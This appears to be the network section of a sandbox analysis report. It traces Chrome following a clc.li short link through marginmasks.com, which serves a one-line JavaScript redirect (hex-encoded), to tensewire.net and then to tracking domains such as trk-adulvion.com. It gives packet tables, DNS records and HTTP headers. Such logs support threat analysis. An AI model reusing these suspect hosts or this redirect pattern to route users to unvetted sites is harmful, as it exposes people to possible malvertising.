                              Apr 25, 2024 20:22:18.695324898 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:18.695339918 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:18.696376085 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:18.696438074 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:18.698421001 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:18.698476076 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:18.698995113 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:18.699002028 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:18.751967907 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:18.848354101 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:18.848563910 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:18.849524975 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:18.959959984 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:18.959995985 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:19.022948980 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.023057938 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.023104906 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.024420977 CEST49783443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.024435997 CEST44349783104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.027193069 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.027226925 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.027292967 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.027806997 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.027823925 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.256620884 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.261730909 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.261754990 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.262147903 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.272609949 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.272689104 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.273722887 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.316143990 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.598073959 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.598196030 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.598364115 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.598896980 CEST49784443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.598917007 CEST44349784104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.791393042 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.791474104 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:19.791582108 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.791881084 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:19.791908979 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.025082111 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.025712967 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.025770903 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.027456045 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.027678967 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.028444052 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.028733015 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.029062986 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.029094934 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.077384949 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.315520048 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.315759897 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.315891981 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.315973043 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.315978050 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316066980 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316158056 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316204071 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316252947 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316267967 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316376925 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316443920 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316462994 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316561937 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316653013 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316669941 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316684008 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316809893 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316864014 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316876888 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.316929102 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.316941023 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.317015886 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:20.317131042 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.317477942 CEST49786443192.168.2.4104.21.80.104
                              Apr 25, 2024 20:22:20.317506075 CEST44349786104.21.80.104192.168.2.4
                              Apr 25, 2024 20:22:23.096741915 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:23.096911907 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:23.096966982 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:24.461724043 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:24.461750031 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:23:08.532504082 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:08.532588959 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.532689095 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:08.532955885 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:08.532991886 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.763674974 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.770598888 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:08.770634890 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.771100998 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.771625042 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:08.771713972 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:08.812371969 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:13.046207905 CEST4972380192.168.2.4199.232.210.172
                              Apr 25, 2024 20:23:13.046292067 CEST4972480192.168.2.4199.232.210.172
                              Apr 25, 2024 20:23:13.155757904 CEST8049724199.232.210.172192.168.2.4
                              Apr 25, 2024 20:23:13.155776024 CEST8049723199.232.210.172192.168.2.4
                              Apr 25, 2024 20:23:13.155787945 CEST8049723199.232.210.172192.168.2.4
                              Apr 25, 2024 20:23:13.155983925 CEST8049724199.232.210.172192.168.2.4
                              Apr 25, 2024 20:23:13.156544924 CEST4972480192.168.2.4199.232.210.172
                              Apr 25, 2024 20:23:13.156544924 CEST4972380192.168.2.4199.232.210.172
                              Apr 25, 2024 20:23:18.768151045 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:18.768347025 CEST44349794142.250.9.99192.168.2.4
                              Apr 25, 2024 20:23:18.768426895 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:18.949078083 CEST49794443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:23:18.949124098 CEST44349794142.250.9.99192.168.2.4
                              TimestampSource PortDest PortSource IPDest IP
                              Apr 25, 2024 20:22:06.233814955 CEST53596371.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:06.661344051 CEST53618081.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:07.341991901 CEST53520131.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:07.647167921 CEST5197753192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:07.649959087 CEST5917453192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:07.772574902 CEST53591741.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:07.861392975 CEST53519771.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:08.481265068 CEST5513953192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:08.481416941 CEST5528353192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:08.591741085 CEST53552831.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:08.591806889 CEST53551391.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:08.678858042 CEST5999653192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:08.679023027 CEST6126053192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:08.819742918 CEST53612601.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:08.833260059 CEST53599961.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:10.818855047 CEST6462953192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:10.819114923 CEST5142953192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:10.931863070 CEST53646291.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:10.932374001 CEST53514291.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:12.541995049 CEST5928353192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:12.542198896 CEST5966153192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:12.653068066 CEST53592831.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:12.655148029 CEST53596611.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:14.696547031 CEST5402353192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:14.696702003 CEST5379953192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:14.807763100 CEST53626151.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:14.810441971 CEST53537991.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:14.811161041 CEST53540231.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:16.794572115 CEST5578853192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:16.801584959 CEST6319453192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:16.906841993 CEST53557881.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:16.912434101 CEST53631941.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:17.990255117 CEST53532671.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:18.348026991 CEST5318053192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:18.348460913 CEST5712453192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:18.461833954 CEST53531801.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:18.462647915 CEST53571241.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:19.675435066 CEST5673253192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:19.675771952 CEST6187553192.168.2.41.1.1.1
                              Apr 25, 2024 20:22:19.789760113 CEST53618751.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:19.790247917 CEST53567321.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:24.573734045 CEST53541661.1.1.1192.168.2.4
                              Apr 25, 2024 20:22:24.617732048 CEST138138192.168.2.4192.168.2.255
                              Apr 25, 2024 20:22:43.644040108 CEST53531081.1.1.1192.168.2.4
                              Apr 25, 2024 20:23:06.190341949 CEST53594031.1.1.1192.168.2.4
                              Apr 25, 2024 20:23:06.646008015 CEST53608131.1.1.1192.168.2.4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Apr 25, 2024 20:22:07.647167921 CEST192.168.2.41.1.1.10x257eStandard query (0)clc.liA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:07.649959087 CEST192.168.2.41.1.1.10xb02fStandard query (0)clc.li65IN (0x0001)false
                              Apr 25, 2024 20:22:08.481265068 CEST192.168.2.41.1.1.10x1ad4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.481416941 CEST192.168.2.41.1.1.10x754fStandard query (0)www.google.com65IN (0x0001)false
                              Apr 25, 2024 20:22:08.678858042 CEST192.168.2.41.1.1.10x510dStandard query (0)marginmasks.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.679023027 CEST192.168.2.41.1.1.10x4370Standard query (0)marginmasks.com65IN (0x0001)false
                              Apr 25, 2024 20:22:10.818855047 CEST192.168.2.41.1.1.10x5540Standard query (0)tensewire.netA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:10.819114923 CEST192.168.2.41.1.1.10xb3dcStandard query (0)tensewire.net65IN (0x0001)false
                              Apr 25, 2024 20:22:12.541995049 CEST192.168.2.41.1.1.10xe42aStandard query (0)tensewire.netA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:12.542198896 CEST192.168.2.41.1.1.10x389fStandard query (0)tensewire.net65IN (0x0001)false
                              Apr 25, 2024 20:22:14.696547031 CEST192.168.2.41.1.1.10x51c5Standard query (0)trk-adulvion.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:14.696702003 CEST192.168.2.41.1.1.10x7e85Standard query (0)trk-adulvion.com65IN (0x0001)false
                              Apr 25, 2024 20:22:16.794572115 CEST192.168.2.41.1.1.10xdd8dStandard query (0)trk-amropode.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:16.801584959 CEST192.168.2.41.1.1.10x869bStandard query (0)trk-amropode.com65IN (0x0001)false
                              Apr 25, 2024 20:22:18.348026991 CEST192.168.2.41.1.1.10x5076Standard query (0)event.trk-adulvion.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:18.348460913 CEST192.168.2.41.1.1.10xfae5Standard query (0)event.trk-adulvion.com65IN (0x0001)false
                              Apr 25, 2024 20:22:19.675435066 CEST192.168.2.41.1.1.10xded7Standard query (0)event.trk-adulvion.comA (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:19.675771952 CEST192.168.2.41.1.1.10xb801Standard query (0)event.trk-adulvion.com65IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Apr 25, 2024 20:22:07.772574902 CEST1.1.1.1192.168.2.40xb02fNo error (0)clc.li65IN (0x0001)false
                              Apr 25, 2024 20:22:07.861392975 CEST1.1.1.1192.168.2.40x257eNo error (0)clc.li172.67.128.112A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:07.861392975 CEST1.1.1.1192.168.2.40x257eNo error (0)clc.li104.21.1.254A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591741085 CEST1.1.1.1192.168.2.40x754fNo error (0)www.google.com65IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.591806889 CEST1.1.1.1192.168.2.40x1ad4No error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:08.833260059 CEST1.1.1.1192.168.2.40x510dNo error (0)marginmasks.com31.24.251.250A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:10.931863070 CEST1.1.1.1192.168.2.40x5540No error (0)tensewire.net104.21.47.80A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:10.931863070 CEST1.1.1.1192.168.2.40x5540No error (0)tensewire.net172.67.170.199A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:10.932374001 CEST1.1.1.1192.168.2.40xb3dcNo error (0)tensewire.net65IN (0x0001)false
                              Apr 25, 2024 20:22:12.653068066 CEST1.1.1.1192.168.2.40xe42aNo error (0)tensewire.net104.21.47.80A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:12.653068066 CEST1.1.1.1192.168.2.40xe42aNo error (0)tensewire.net172.67.170.199A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:12.655148029 CEST1.1.1.1192.168.2.40x389fNo error (0)tensewire.net65IN (0x0001)false
                              Apr 25, 2024 20:22:14.810441971 CEST1.1.1.1192.168.2.40x7e85No error (0)trk-adulvion.com65IN (0x0001)false
                              Apr 25, 2024 20:22:14.811161041 CEST1.1.1.1192.168.2.40x51c5No error (0)trk-adulvion.com104.21.80.104A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:14.811161041 CEST1.1.1.1192.168.2.40x51c5No error (0)trk-adulvion.com172.67.177.226A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:16.906841993 CEST1.1.1.1192.168.2.40xdd8dNo error (0)trk-amropode.com104.21.22.140A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:16.906841993 CEST1.1.1.1192.168.2.40xdd8dNo error (0)trk-amropode.com172.67.205.30A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:16.912434101 CEST1.1.1.1192.168.2.40x869bNo error (0)trk-amropode.com65IN (0x0001)false
                              Apr 25, 2024 20:22:18.461833954 CEST1.1.1.1192.168.2.40x5076No error (0)event.trk-adulvion.com104.21.80.104A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:18.461833954 CEST1.1.1.1192.168.2.40x5076No error (0)event.trk-adulvion.com172.67.177.226A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:18.462647915 CEST1.1.1.1192.168.2.40xfae5No error (0)event.trk-adulvion.com65IN (0x0001)false
                              Apr 25, 2024 20:22:19.789760113 CEST1.1.1.1192.168.2.40xb801No error (0)event.trk-adulvion.com65IN (0x0001)false
                              Apr 25, 2024 20:22:19.790247917 CEST1.1.1.1192.168.2.40xded7No error (0)event.trk-adulvion.com104.21.80.104A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:19.790247917 CEST1.1.1.1192.168.2.40xded7No error (0)event.trk-adulvion.com172.67.177.226A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:21.732009888 CEST1.1.1.1192.168.2.40x2626No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Apr 25, 2024 20:22:21.732009888 CEST1.1.1.1192.168.2.40x2626No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:34.580487967 CEST1.1.1.1192.168.2.40x984No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Apr 25, 2024 20:22:34.580487967 CEST1.1.1.1192.168.2.40x984No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:22:58.747792006 CEST1.1.1.1192.168.2.40x3fc6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Apr 25, 2024 20:22:58.747792006 CEST1.1.1.1192.168.2.40x3fc6No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Apr 25, 2024 20:23:18.949958086 CEST1.1.1.1192.168.2.40xa724No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Apr 25, 2024 20:23:18.949958086 CEST1.1.1.1192.168.2.40xa724No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              • clc.li
                              • marginmasks.com
                              • https:
                                • tensewire.net
                                • trk-adulvion.com
                                • trk-amropode.com
                                • event.trk-adulvion.com
                              • fs.microsoft.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449735172.67.128.1124435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:08 UTC654OUTGET /bsLRU HTTP/1.1
                              Host: clc.li
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:08 UTC875INHTTP/1.1 301 Moved Permanently
                              Date: Thu, 25 Apr 2024 18:22:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=81bc6c52da45de8612307d93c74dd517; path=/
                              Set-Cookie: short_2102=1; expires=Thu, 25-Apr-2024 18:37:08 GMT; Max-Age=900; path=/; HttpOnly
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Pragma: no-cache
                              location: https://marginmasks.com/0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cycD5WEDJTt2UPwEpKlDZSP4%2Fnahvqnujcke9KQ5LwBvM2nAAY9ss0KO6joDu4hBXSrp%2FRk84J0eIfcj2GAK7J1YiuxJ%2FHK3NzgY7ZG4U4ew3nIBur3sMqQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b55fde1b0e2-ATL
                              alt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:08 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.44973831.24.251.2504435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:09 UTC702OUTGET /0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim HTTP/1.1
                              Host: marginmasks.com
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:10 UTC312INHTTP/1.1 200 OK
                              date: Thu, 25 Apr 2024 18:22:10 GMT
                              content-type: text/html; charset=UTF-8
                              content-length: 131
                              server: Apache
                              set-cookie: uid7090=1174009843-20240425142210-5ba165a6bc31abaff6de694727ce6d09-; domain=; expires=Sat, 25-May-2024 18:22:10 GMT; path=/; SameSite=None; Secure
                              connection: close
                              2024-04-25 18:22:10 UTC131INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6e 73 65 77 69 72 65 2e 6e 65 74 2f 3f 73 31 3d 33 35 30 33 35 39 26 73 32 3d 31 31 37 34 30 30 39 38 34 33 26 73 33 3d 37 30 39 30 26 73 34 3d 31 26 73 31 30 3d 34 35 35 30 22 3c 2f 73 63 72 69 70 74 3e
                              Data Ascii: <script type="text/javascript">window.location.href="https://tensewire.net/?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550"</script>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449741104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:11 UTC723OUTGET /?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-Dest: document
                              Referer: https://marginmasks.com/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:11 UTC892INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              set-cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef; path=/; secure
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iqr6161Vn%2F2fVpKvPkTH%2Fq9JblZfOzvuzJ8iO6hYLYZ2X490BO54Hpud8wSheRPfJHAwGNc07trXgKVlUSLetueYooq%2F3KByFvkbY5BYzZvZ0ATsXlSgb4Kjg3O7%2BWrm"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b694d5107ca-ATL
